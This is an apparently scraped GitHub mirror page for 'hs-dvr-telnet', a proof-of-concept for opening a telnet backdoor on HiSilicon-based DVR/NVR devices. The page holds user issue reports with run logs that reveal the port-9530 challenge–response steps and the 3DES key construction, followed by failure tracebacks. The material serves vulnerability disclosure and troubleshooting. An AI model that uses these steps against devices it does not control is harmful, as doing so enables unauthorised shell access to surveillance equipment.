tothi / hs-dvr-telnet Goto Github PK
View Code? Open in Web Editor NEWopen telnet port on modern HiSilicon devices
open telnet port on modern HiSilicon devices
Hello,
The PoC does not work on my xiongmaitech AHB7804R NVR (HiSilicon Hi3520) with the latest firmware (V3_V4.03.R11.7601).
When I run it I get :
(venv) paul@paul-VirtualBox:~/hs-dvr-telnet$ ./hs-dvr-telnet.py 192.168.1.24 live3636
[+] Opening connection to 192.168.1.24 on port 9530: Done
[*] sending OpenTelnet:OpenOnce...
[*] received challenge randNum:34929138
[*] using password live3636
[*] initializing (modified) 3des with key 34929138live3636
[*] sending encrypted challenge 8B:CB:CB:2B:86:85:0A:8C:D7:99:AB:6D:B8:D8:55:E4
Traceback (most recent call last):
File "./hs-dvr-telnet.py", line 54, in <module>
dvrHelper.open_telnet(args.password)
File "./hs-dvr-telnet.py", line 37, in open_telnet
assert self.recv(2) == b"OK"
AssertionError
And then the 9530 port closes (I don't see it anymore on nmap)
When I launch the script a second time I get :
(venv) paul@paul-VirtualBox:~/hs-dvr-telnet$ ./hs-dvr-telnet.py 192.168.1.24 live3636
[-] Opening connection to 192.168.1.24 on port 9530: Failed
[ERROR] Could not connect to 192.168.1.24 on port 9530
Traceback (most recent call last):
File "./hs-dvr-telnet.py", line 53, in <module>
dvrHelper = DvrHelper(args.host, PORT)
File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/remote.py", line 75, in __init__
self.sock = self._connect(fam, typ)
File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/tubes/remote.py", line 115, in _connect
self.error("Could not connect to %s on port %d" % (self.rhost, self.rport))
File "/home/paul/hs-dvr-telnet/venv/lib/python3.6/site-packages/pwnlib/log.py", line 417, in error
raise PwnlibException(message % args)
pwnlib.exception.PwnlibException: Could not connect to 192.168.1.24 on port 9530
Rebooting the NVR reopen the 9530 port.
Thank you
I have an XM NVR with firmware "Build Date: 2020-09-12 15:59:39", and here's portscan:
80/tcp open http
554/tcp open rtsp
12901/tcp open unknown
23000/tcp open inovaport1
30100/tcp open rwp
34567/tcp open dhanalakshmi
Which is of course only sad, as it complicates users' access to their devices...
When running the code on my Fisotech box, I get the following output:
[+] Opening connection to 192.168.1.30 on port 9530: Done
[*] sending OpenTelnet:OpenOnce...
[*] received challenge randNum:96528459
[*] using password 2wj9fsa2
[*] initializing (modified) 3des with key 965284592wj9fsa2
[*] sending encrypted challenge 42:6F:3E:B9:8D:6A:01:EE:B6:62:FC:32:F8:6B:53:EC
[+] verify:OK
[*] sending encrypted command Telnet:OpenOnce...
Traceback (most recent call last):
File "./hs-dvr-telnet.py", line 54, in <module>
dvrHelper.open_telnet(args.password)
File "./hs-dvr-telnet.py", line 42, in open_telnet
self.recvuntil("Open:")
File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 310, in recvuntil
res = self.recv(timeout=self.timeout)
File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 82, in recv
return self._recv(numb, timeout) or b''
File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 160, in _recv
if not self.buffer and not self._fillbuffer(timeout):
File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/tube.py", line 131, in _fillbuffer
data = self.recv_raw(self.buffer.get_fill_size())
File "/dvr/hs-dvr-telnet/venv/lib/python3.8/site-packages/pwnlib/tubes/sock.py", line 56, in recv_raw
raise EOFError
EOFError
Does that mean that my box is not vulnerable to this 0day?
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.